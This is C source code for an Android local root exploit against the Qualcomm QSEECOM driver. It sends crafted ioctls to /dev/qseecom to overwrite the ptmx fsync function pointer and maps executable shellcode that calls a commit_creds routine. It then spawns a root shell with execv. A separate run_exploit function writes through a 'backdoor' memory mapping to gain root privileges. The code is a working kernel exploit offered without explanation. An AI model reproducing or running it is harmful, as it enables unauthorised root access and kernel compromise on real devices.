static bool run_exploit(void) { void **ptmx_fsync_address; unsigned long int ptmx_fops_address; int fd; bool ret; ptmx_fops_address = get_ptmx_fops_address(); if (!ptmx_fops_address) { return false; } if (!backdoor_open_mmap()) { printf("Failed to mmap due to %s.\n", strerror(errno)); printf("Run 'install_backdoor' first\n"); return false; } ptmx_fsync_address = backdoor_convert_to_mmaped_address((void *)ptmx_fops_address + 0x38); *ptmx_fsync_address = obtain_root_privilege; ret = run_obtain_root_privilege(NULL); *ptmx_fsync_address = NULL; backdoor_close_mmap(); return ret; }
int main(int argc, char *argv[]){ printf("mypid %d\n",getpid()); int ret = -1; int fd = open("/dev/qseecom", 0); if (fd<0){ perror("open"); exit(-1); } void* abuseBuff = malloc(400); memset(abuseBuff,0,400); int* intArr = (int*)abuseBuff; int j = 0; for(j=0;j<24;j++){ intArr[j] = 0x1; } struct qseecom_send_modfd_cmd_req ioctlBuff; prctl(PR_SET_NAME, "GodFather", 0, 0, 0); // if(0==fork()){ g_pid = getpid(); g_tgid = g_pid; prctl(PR_SET_NAME, "ihoo.darkytools", 0, 0, 0); //QSEECOM_IOCTL_SET_MEM_PARAM_REQ struct qseecom_set_sb_mem_param_req req; req.ifd_data_fd = obtain_dma_buf_fd(8192); req.virt_sb_base = abuseBuff; req.sb_len = 8192; ret = ioctl(fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &req); printf("QSEECOM_IOCTL_SET_MEM_PARAM_REQ return 0x%x \n",ret); ioctlBuff.cmd_req_buf = abuseBuff; ioctlBuff.cmd_req_len = 400; ioctlBuff.resp_buf = abuseBuff; ioctlBuff.resp_len = 400; int i = 0; for (i = 0;i<4;i++){ ioctlBuff.ifd_data[i].fd = 0; ioctlBuff.ifd_data[i].cmd_buf_offset =0; } ioctlBuff.ifd_data[0].fd = req.ifd_data_fd; ioctlBuff.ifd_data[0].cmd_buf_offset = 0;//(int)(0xc03f0ab4 + 8) - (int)abuseBuff; printf("QSEECOM_IOCTL_SEND_CMD_REQ"); ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff); printf("return %p %p\n",intArr[0],intArr[1]); perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n"); printf("ioctl return 0x%x \n",ret); //*(int*)intArr[0] = 0x0; void* addr = mmap(intArr[0],4096,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS,-1,0); printf("mmap return %p \n",addr); *(int*)addr = 0xE3500000; *((int*)((int)addr+4)) = 0xe1a0f00e; memcpy(addr,shell_code2,400); int* arr = (int*)addr; for(i=0;i<10;i++){ if(arr[i] == 0xeeeeeeee) arr[i] = (int)MyCommitCred; printf("%p\n",arr[i]); } //c1334e00 b ptmx_fops ioctlBuff.ifd_data[0].cmd_buf_offset = (int)(PTMX_FOPS + 14*4) - (int)abuseBuff; printf("QSEECOM_IOCTL_SEND_CMD_REQ"); ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff); printf("return %p %p\n",intArr[0],intArr[1]); perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n"); printf("ioctl return 0x%x \n",ret); run_obtain_root_privilege(); char * argv1[]={"sh",(char *)0}; int result = execv("/system/bin/sh", argv1); if(result){ perror("execv"); } return 0; }